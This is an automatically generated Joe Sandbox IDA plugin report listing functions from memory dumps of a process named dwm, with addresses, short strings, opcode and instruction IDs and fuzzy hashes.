Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: d5b50e1aee6772ce57d806e8e82827f22e8d75fda8ae6a142ce919394d9cefa2
Instruction ID: ed0e47460a5a9cbf1a5a97b059b8aae1108d52a04fe9c357ff99f2e38312d4af
Opcode Fuzzy Hash: d5b50e1aee6772ce57d806e8e82827f22e8d75fda8ae6a142ce919394d9cefa2
Instruction Fuzzy Hash: 6F41C131D48A498FE765DA18D8547F93BB1FBA5320F0402BAD40EC3296DA687892C7C1

Function 00007FF887D6D481 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

8eL, xrefs: 00007FF887D6D4FA

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: 8eL
API String ID: 0-2915619072
Opcode ID: 3d8603f8f087cb4c3c036a863c3124d86f6c7df148e5f360a8d02bc646f44008
Instruction ID: a71ae65072545461e7dae46f15b20f464c5c2c2b87d1b20887cefababe40144f
Opcode Fuzzy Hash: 3d8603f8f087cb4c3c036a863c3124d86f6c7df148e5f360a8d02bc646f44008
Instruction Fuzzy Hash: 0521D332E4C9498FEF519A58A8503FD37B1FB95360F090276E40AD7289DE38AD4587C1

Function 00007FF887D68079 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D68096

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 9cc1e59caf74a195affe04e23dadd67a908521f65a43019cfb4ce70529364ee2
Instruction ID: 7d42575801023436b7de0eee925b12f9c53dd3a1357edd7b3018d91c4aedae7d
Opcode Fuzzy Hash: 9cc1e59caf74a195affe04e23dadd67a908521f65a43019cfb4ce70529364ee2
Instruction Fuzzy Hash: 66112432D4E6C54FD702EB7898A64DC7FB0FF46250B0942FBD049CB0A3E918A949C341

Function 00007FF887D49B1C Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

cM_H, xrefs: 00007FF887D4C172

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d40000_dwm.jbxd

Similarity

API ID:
String ID: cM_H
API String ID: 0-900796763
Opcode ID: 281bca927f8eaac52afeae6a3febd20357f891ca204f7d35964353929d6cec6c
Instruction ID: b5e2d69135f4d0c5841cfa09ad49a8873a65d0c76988ecea4a10cf1a4298fb54
Opcode Fuzzy Hash: 281bca927f8eaac52afeae6a3febd20357f891ca204f7d35964353929d6cec6c
Instruction Fuzzy Hash: D7111F21E8891A4BFB94EB18C4557BD22B2FF98390F544675D41FD72DAEE28EC02C780

Function 00007FF887D62F59 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D62F76

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 13156e7d62761541d647bd5ae1ac6898f50ae22885f3c45adbe7c59a3bc142ee
Instruction ID: 73a6579d657c35ce4e89e63dc32b5711a7f974a22557443cef306fe1061cf535
Opcode Fuzzy Hash: 13156e7d62761541d647bd5ae1ac6898f50ae22885f3c45adbe7c59a3bc142ee
Instruction Fuzzy Hash: 52F0B47194E7C48FC71ADA34445A85DBF70FF1764074942EEC046CF5A7DA2E9885C701

Function 00007FF887D59799 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D597B6

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4a30ba19833df6b1d95819f65d7b5598c548907853932370d65b95e6cecd5a11
Instruction ID: 46cedbcaabe0cd1c0dd5060434965e5b878687bcd0a20955b0d292cb98aa2542
Opcode Fuzzy Hash: 4a30ba19833df6b1d95819f65d7b5598c548907853932370d65b95e6cecd5a11
Instruction Fuzzy Hash: D4F0EC6188F3C04FD715DB3448569987F60EF273507CA41EEC085CF1A3D61E8449C701

Function 00007FF887D61C99 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D61CB6

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: db5536318f13e0d9e8396f4c1f7a16a61adb4395cb6fc73c3eef84f1f889d637
Instruction ID: f2fbb2e861d0d66115385e1abc6ab57817c1d962e79638cb7d2f0ee30f9a1f8a
Opcode Fuzzy Hash: db5536318f13e0d9e8396f4c1f7a16a61adb4395cb6fc73c3eef84f1f889d637
Instruction Fuzzy Hash: 85F02B71A4E3C04FCB07D63448584587F71EF6720074A41EEC046CF197EA2DC846C741

Function 00007FF887D6A319 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D6A336

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 1086428d5263d84a6eaeb86f78fabd7a28ec061898498a653821589210960db9
Instruction ID: 5f95798760ba6e4187fdfb71eceb3bd12ddfc301dc14fd15cdd9a80cab2cf774
Opcode Fuzzy Hash: 1086428d5263d84a6eaeb86f78fabd7a28ec061898498a653821589210960db9
Instruction Fuzzy Hash: 04F06571A4E7C44FC716D63448694557F60EF6720174A42EEC046CF1A7EA2DD885CB81

Function 00007FF887D6A289 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D6A2A6

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9c61730f3be372bac8f3e0423b6c3579e5bff2bbc9491f9c47cdeff88a8a9c59
Instruction ID: b8c322f8bc330c868ffe8f1117f7f7ec77a1441b2cad43fb46995c0d5e234691
Opcode Fuzzy Hash: 9c61730f3be372bac8f3e0423b6c3579e5bff2bbc9491f9c47cdeff88a8a9c59
Instruction Fuzzy Hash: D1F0E57094E3C04FC70A9A7448294557FA0EF6B20034E13EFC045CF1A3EA2DC885C701

Function 00007FF887D6A859 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D6A876

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: bf41b96cf18f829a51b66b712c70cf4397ec1ecb16530e1c5753a34b212d0657
Instruction ID: 08ea65a10a307ec7e6ae0e470b872733c1fbfed2c5d6db809b164b2639ce5727
Opcode Fuzzy Hash: bf41b96cf18f829a51b66b712c70cf4397ec1ecb16530e1c5753a34b212d0657
Instruction Fuzzy Hash: F3E0127184E3C04FC706DB7588658553FA0EE6B21078E42EEC04ACF1B3E62DD849C701

Function 00007FF887D595E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D59606

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 98ea1211208fa484d29866c0dcbc35cc45a21ebe4eb20e2e3f847f866515f2eb
Instruction ID: ec6f086582aa62b5e0f9b606179adc4baf482afdd450fc6d469e173b3e01723a
Opcode Fuzzy Hash: 98ea1211208fa484d29866c0dcbc35cc45a21ebe4eb20e2e3f847f866515f2eb
Instruction Fuzzy Hash: 2FE01A7158E7C44FCB4AEB7488699447FB0AF6735178A41EEC046CF5B7E62D884ACB01

Function 00007FF887D61D29 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D61D46

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 0d195f41bd289f6229678403b642096b46fc1d30c506b3661d8e69049e322d13
Instruction ID: 12c9394e60d83bdd532c5edc7f55da4706b42e4a0819016f5ecf36d9c830174c
Opcode Fuzzy Hash: 0d195f41bd289f6229678403b642096b46fc1d30c506b3661d8e69049e322d13
Instruction Fuzzy Hash: F6E09A7148E7C44FCB06EB3488699483FA0AE2720078E00EEC046CF1B3E62E8849CB01

Function 00007FF887D5E60B Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D5E616

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 27196e67774e36df231a74dd26b6215f9b864279187848ab98fcbc77ecd814b2
Instruction ID: 7ab8a069edd437a4e915352f78b751e1dc8618fda9153bfbd0ed36c4d32b953f
Opcode Fuzzy Hash: 27196e67774e36df231a74dd26b6215f9b864279187848ab98fcbc77ecd814b2
Instruction Fuzzy Hash: 06E0C271A4A5954FCB19FA38845C824BB90EB6724174846BCC00BCF196EE29C886CB00

Function 00007FF887D63425 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ab6c6ad9cc686b4ee4dc3821919bc0c47fb7eb0ea563a0ca4620404aa3a7f6
Instruction ID: e16dabcbe9333517cab8310fe32330c5eaf77884138a5d6a38765b38f3c7fbb5
Opcode Fuzzy Hash: 24ab6c6ad9cc686b4ee4dc3821919bc0c47fb7eb0ea563a0ca4620404aa3a7f6
Instruction Fuzzy Hash: F391C422E5C98A5FEB98EA6894563BD77E1FF54380F044279E40FC718BDD28B846C781

Function 00007FF887D308D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa88624448f683ad51fa48a374422087f1117051b97a9e20cc642e3f0880fb93
Instruction ID: 1f443647762cf04e59a9e979a97cd51d304e2e5d7519c03ab63ed486068c32ec
Opcode Fuzzy Hash: aa88624448f683ad51fa48a374422087f1117051b97a9e20cc642e3f0880fb93
Instruction Fuzzy Hash: 15413622F4C9564AE304B7ACF4553FD7791EF843A1B0845BBD05ECB197DE18AC42C295

Function 00007FF887D3116D Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68128f6159c3172552df63a087175cfe92aa2291e1379dfa5daac02def03d8eb
Instruction ID: a667d8028c54626b1af6044ea7a8c0728e70b7807ff68ca93f913d53984730cf
Opcode Fuzzy Hash: 68128f6159c3172552df63a087175cfe92aa2291e1379dfa5daac02def03d8eb
Instruction Fuzzy Hash: BB41C131D0895B8FEB05EBA8C855AFD7BB0FF55354B0402BAC01AC71A7EE2DA441CB51

Function 00007FF887D33B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc08ad090303d211365f0c09baaa6cc55571df13e4b69f61dbcb024fd06e5d7c
Instruction ID: 902b9d0a5a5d3b4531b97db4341a9e639e8833b43f17bbfd9f514e514fb5a17d
Opcode Fuzzy Hash: bc08ad090303d211365f0c09baaa6cc55571df13e4b69f61dbcb024fd06e5d7c
Instruction Fuzzy Hash: 2C311432E4890B4BFBA4E718C4557BD76A2FF54390F5502BAD01FD3199EE28A941C740

Function 00007FF887D30998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392dd625c1046dcec3380589f7878ea51039e1b5ddd9b1626695455b12cf02db
Instruction ID: 5bbc16d0a7e1b79a75f5c96fac19f3c7ec4c6da1adf5633c688db6c256a32486
Opcode Fuzzy Hash: 392dd625c1046dcec3380589f7878ea51039e1b5ddd9b1626695455b12cf02db
Instruction Fuzzy Hash: F821D720B58D1A4FF748B66CA85977D77D2FB98391B1441BAE80FC32D6DD18DC428281

Function 00007FF887D63701 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a1ab37bd8164e2bf27d976c70217517a78f1ea0d0ca4f35e7459ee6e404cb6
Instruction ID: 5822be9d1c97ac5e6a315b6a94eabd991ff824580362387093c3a7f14ecfd291
Opcode Fuzzy Hash: 34a1ab37bd8164e2bf27d976c70217517a78f1ea0d0ca4f35e7459ee6e404cb6
Instruction Fuzzy Hash: 49213872E4D98A5FE745EB68A8462FC7BE0FF45350F0401B6D04EC3197DC296886C381

Function 00007FF887D30C25 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd831c6a7b58ac541e1be21a85fb70d8dc9d6a08f383aa8d03e508e64c638fbe
Instruction ID: dcd4021d3d665d92ac9ca4e11aba385139738ff795bff3ad5f463ac3df9084ba
Opcode Fuzzy Hash: cd831c6a7b58ac541e1be21a85fb70d8dc9d6a08f383aa8d03e508e64c638fbe
Instruction Fuzzy Hash: 1811CB36F4C55B8AF701A6A8E8011EC7760FFC13B5F148672D12E8A1C6D9387A87C6D5

Function 00007FF887D677E9 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d046191bea80f8e604b55bf9592ad32dd2ec4cb8e64ca3c46f4e232e65b6fb3d
Instruction ID: 52ec6a84d979e87bb92dfdf2741099734095bc5b02f6691b91a36685350c51dd
Opcode Fuzzy Hash: d046191bea80f8e604b55bf9592ad32dd2ec4cb8e64ca3c46f4e232e65b6fb3d
Instruction Fuzzy Hash: D711E971C8E7C94FD7179B3448594A87FB0FF56220B4D42FBD0898F1A7EA186945C781

Function 00007FF887D442C3 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d40000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a71efaf0a298e0e4418343599243af463a3a933ce50ebac3f4cc1131672945
Instruction ID: 9d7653394ff4268247ffcfa5d98891e78057a4f47e16e0bf2fc919ba24ee5686
Opcode Fuzzy Hash: f8a71efaf0a298e0e4418343599243af463a3a933ce50ebac3f4cc1131672945
Instruction Fuzzy Hash: F3115471E8840A8BEB94DB94D8942BD77B1FF50740F10463AC41BD729ADF386982CB80

Function 00007FF887D66D20 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935ebe40358d6035ea6fa9ba8e973955251771b63336928a2aa5a9f0eec61635
Instruction ID: 7f00ed13ce99489f46834d3dc65ca69da51c2b62714bcdb4458b65da66dfcf8a
Opcode Fuzzy Hash: 935ebe40358d6035ea6fa9ba8e973955251771b63336928a2aa5a9f0eec61635
Instruction Fuzzy Hash: D7012626E0D5950EE701B26CE4911EC3BA0DF8227970C02B7D19E8E0A3DC09A48AC691

Function 00007FF887D5CDF9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c03419243a0d97e50d8da48cea49c9ffb9cd72e95735159f1a0dfd6e7d39e5e
Instruction ID: 837165cd6d4c5cc1b61b51308047687897a1280fa6d21bdd346044e3d953c598
Opcode Fuzzy Hash: 2c03419243a0d97e50d8da48cea49c9ffb9cd72e95735159f1a0dfd6e7d39e5e
Instruction Fuzzy Hash: 5E01267594E2C94FE3129B388C554AC7FB0FF12201B0A02FBC48ECB0A3D9294847C341

Function 00007FF887D5DB65 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c7cbf63ce934ee40dd8204d1ed9baf6dbe7edfdf890a014adb30c4fc793061
Instruction ID: efc3fda088cf48a27b9f1b6587050971a1c9ad5b036a3fe53dc473a507292eb8
Opcode Fuzzy Hash: c3c7cbf63ce934ee40dd8204d1ed9baf6dbe7edfdf890a014adb30c4fc793061
Instruction Fuzzy Hash: 74F02712E8EECA2FD356966C68511A42FF2FBA6161B8903B7C08DC719BD80D5C4783A1

Function 00007FF887D3417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c519f0a858e6bdbd2e167f75a8703de09ce1dfaf7d9ce8325b485799e333b3
Instruction ID: 43687e49716db8279bb5f147e239e76efdd1f0a2666294a0a31f151d6a3f3f63
Opcode Fuzzy Hash: a6c519f0a858e6bdbd2e167f75a8703de09ce1dfaf7d9ce8325b485799e333b3
Instruction Fuzzy Hash: 14012D30A48A1ACFDB94DB04C894EBD73B1FB69340F1042B9C40FD3295DE34A945CB41

Function 00007FF887D6781D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852c0817b540905113a75dcea2f43823a6b5c345ea7e6280669b06f67a56415d
Instruction ID: 03457aa09373ab5de21b3bef5727d949f62d30e2db57363b87a123bd183a67e6
Opcode Fuzzy Hash: 852c0817b540905113a75dcea2f43823a6b5c345ea7e6280669b06f67a56415d
Instruction Fuzzy Hash: A2F08C6194E7CA4FD30B073848640683F70AE6722130E00E3C085CF1F3D91DAC4AC3A2

Function 00007FF887D56E8E Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d54000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b7231e824ac9d063b090cae468d86a26ccbf2c266e165e9b572fd6e4622855
Instruction ID: 1f0aa9a887b5819f40f9ea054bf4d677cea907eddbd74c9ce5608d4901f1c52d
Opcode Fuzzy Hash: 99b7231e824ac9d063b090cae468d86a26ccbf2c266e165e9b572fd6e4622855
Instruction Fuzzy Hash: 08F0AE23F4DE9A0FEAD5DD9CA4C116952D3FB58A603444275C51EC335FDD25DC468380

Function 00007FF887D33C40 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction ID: fb074373178a1185dd59f53d940df2e4934aeac0164d3fb6d9ec219f49026a50
Opcode Fuzzy Hash: e80707e6a6774d6bf8c31d10444a12641733160743cd1eed127dd224d1fb9c9d
Instruction Fuzzy Hash: 81F0CD3198881B8AFB64EB14C954BBD7272FB54351F1442BAC00FD7199EE786985CA00

Function 00007FF887D6A7C9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1d7bf1f0f1ce5b1b82e7b8617f1fd2d93984932c5baf46b543a7529ccaba36
Instruction ID: c8aee4e5afcd30683c8c7ac6ecd381e6c2d6b18c50c6229b6f7aac1bfc2d2f9d
Opcode Fuzzy Hash: 3c1d7bf1f0f1ce5b1b82e7b8617f1fd2d93984932c5baf46b543a7529ccaba36
Instruction Fuzzy Hash: E0F0A021B4CBC44FC729966958A50617FF1EF9B51134A02FFC08BC76A3ED59AC8A8342

Function 00007FF887D3403D Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443422556873def9072e8b71364fb85fb21293a2eb181f48732192f59b6773e0
Instruction ID: fac22e1a8f11156eabc8ec6e42f1ab6ea80c53b24cdb43b8e0b2248c52223059
Opcode Fuzzy Hash: 443422556873def9072e8b71364fb85fb21293a2eb181f48732192f59b6773e0
Instruction Fuzzy Hash: 1BF0AC21E9842B4BF298A6A4D85877C62A2BF45390F504378D42FD22DAED286881C641

Function 00007FF887D30C68 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d30000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb470d0da8597f4a8cf17a6d9c1f47a3ae343207136f3bc15cb9629c8751f2fd
Instruction ID: 694c6f352adf96e25f4967c092d411bc5a30cf1e79d47a5383842b554da3debf
Opcode Fuzzy Hash: eb470d0da8597f4a8cf17a6d9c1f47a3ae343207136f3bc15cb9629c8751f2fd
Instruction Fuzzy Hash: 15F0FE34D5460EDBEB00DFA4C4845DEB7F1FB58354F1046A5D419D7288EA346694CB80

Function 00007FF887D6AB60 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a488ceeaa8c08542c422cbf870db8bb48caf98661fa8ce38a50cf0c07a4842
Instruction ID: 4779f1f275208b92466dd703abb641cc53460979ff128930a290e92c51c13c04
Opcode Fuzzy Hash: f8a488ceeaa8c08542c422cbf870db8bb48caf98661fa8ce38a50cf0c07a4842
Instruction Fuzzy Hash: DDE09B20A98D098FE684E75C84967BC76E2FF98340F440279E00EC3597CE286841DB82

Function 00007FF887D6D7D9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061397cc657d07c221dec3e91899bc5d93689643f52c2c013fcb36fbaf9ff3db
Instruction ID: b9ba8631101439ad73361a986dd45e3d13aa3701fa83873703121a49c38a3d36
Opcode Fuzzy Hash: 061397cc657d07c221dec3e91899bc5d93689643f52c2c013fcb36fbaf9ff3db
Instruction Fuzzy Hash: 40E04F6288E7C04FC70B9B3498A88947FB0EE1721074A41EBC04ACF5B3D92A984AC702

Function 00007FF887D6D759 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.1694856486.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff887d61000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9496bd7971bb98aa3b764f33d782003d8c9b1b19e61d1603f6a369d6b1e87d53
Instruction ID: aa26020289bb0237e620e1bf212ea3914d527f28ea8ddb83437542107a18161c
Opcode Fuzzy Hash: 9496bd7971bb98aa3b764f33d782003d8c9b1b19e61d1603f6a369d6b1e87d53
Instruction Fuzzy Hash: 4FE04F6288E7C08FC70B9B3488688947FB0EE1721074E41EBC086CF5B3E52A9C49C712

Function 00007FF887D36D4F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

